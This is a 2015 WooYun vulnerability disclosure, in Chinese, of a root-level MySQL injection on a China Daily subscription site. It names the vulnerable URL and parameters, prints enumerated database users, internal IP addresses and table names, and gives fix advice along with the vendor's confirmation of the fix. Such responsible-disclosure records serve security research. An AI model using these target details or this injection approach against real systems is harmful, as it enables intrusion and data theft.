漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0110555
漏洞标题:中国日报网某站root权限mysql注入(大量敏感信息)
相关厂商:中国日报网
漏洞作者: 大懒
提交时间:2015-04-27 09:28
修复时间:2015-06-09 12:54
公开时间:2015-06-09 12:54
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:13
漏洞状态:厂商已经修复
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-04-27: 细节已通知厂商并且等待厂商处理中
2015-04-30: 厂商已经确认,细节仅向厂商公开
2015-05-10: 细节向核心白帽子及相关领域专家公开
2015-05-20: 细节向普通白帽子公开
2015-05-30: 细节向实习白帽子公开
2015-06-09: 厂商已经修复漏洞并主动公开,细节向公众公开
简要描述:
中国日报网某站root权限mysql注入
详细说明:
URL:http://subscribe.chinadaily.com.cn/subReceiptQuery/select.action
POST参数:Submit=%e5%bc%80%e5%a7%8b%e6%90%9c%e7%b4%a2&endtime=&starttime=1&Submit2=%e5%85%b3%e9%97%ad%e7%aa%97%e5%8f%a3&username=amyanhaj
存在问题参数:endtime、starttime
database management system users [10]:
[*] 'androidpad'@'192.168.126.31'
[*] 'chinadaily'@'localhost'
[*] 'master'@'172.20.126.52'
[*] 'master'@'192.168.126.32'
[*] 'master'@'192.168.126.33'
[*] 'root'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'
[*] 'root'@'localhost.localdomain'
available databases [5]:
[*] cds
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
Database: cds
[64 tables]
+------------------+
| cp_dingjiacl |
| cp_dingjiaclmx |
| cp_jichucp |
| cp_jichucpzh |
| cp_waibudyxx |
| cp_zuhecp |
| jc_diqu |
| jc_faxingqd |
| jc_wenjian |
| lxs_epaperzy |
| lxs_identity |
| qam_duihuajrzt |
| qam_duihuasjx |
| qam_duihuasjz |
| qam_gongneng |
| qam_gongnengbz |
| qam_gongnengdh |
| qam_gongnenghd |
| qam_guanxiys |
| qam_guanxiysx |
| qam_i18n |
| qam_jihey |
| qam_jiheyz |
| qam_minglingcs |
| qam_minglingkzjg |
| qam_mokuaihf |
| qam_quanjubl |
| qam_seq |
| qam_seq_value |
| qam_shiti |
| qam_shiwudy |
| qam_shujufl |
| qam_shujuy |
| qam_shuxing |
| qam_xitongcd |
| qam_yewudy |
| qam_yewudygnpz |
| qam_yewudystpz |
| v_dingdanxx |
| v_gongnengdh |
| v_gongnenghd |
| v_gongnengmk |
| v_identity |
| v_identity_pad |
| v_shujufl |
| view_chanpinfxcl |
| view_faxingqys |
| view_huiyuanxx |
| view_quanxz |
| view_zuhecpdqs |
| xt_forbidlist |
| xt_quanxiansz |
| xt_quanxianz |
| xt_quanxianzpz |
| xt_renyuanxx |
| xt_rizhi |
| xt_shujuhqx |
| xt_shujulqx |
| xt_yonghu |
| yw_dingdan |
| yw_dingdanlsjl |
| yw_huiyuan |
| yw_huiyuantddz |
| yw_jichudd |
+------------------+
然后找到tomcat管理后台
漏洞证明:
如上
修复方案:
1.修改管理后台地址,或者不让访问
2.结构化查询sql语句
版权声明:转载请注明来源 大懒@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2015-04-30 15:19
厂商回复:
已经联系同事修复中。。后台都出来了..
最新状态:
2015-06-09:感谢 漏洞 已修复。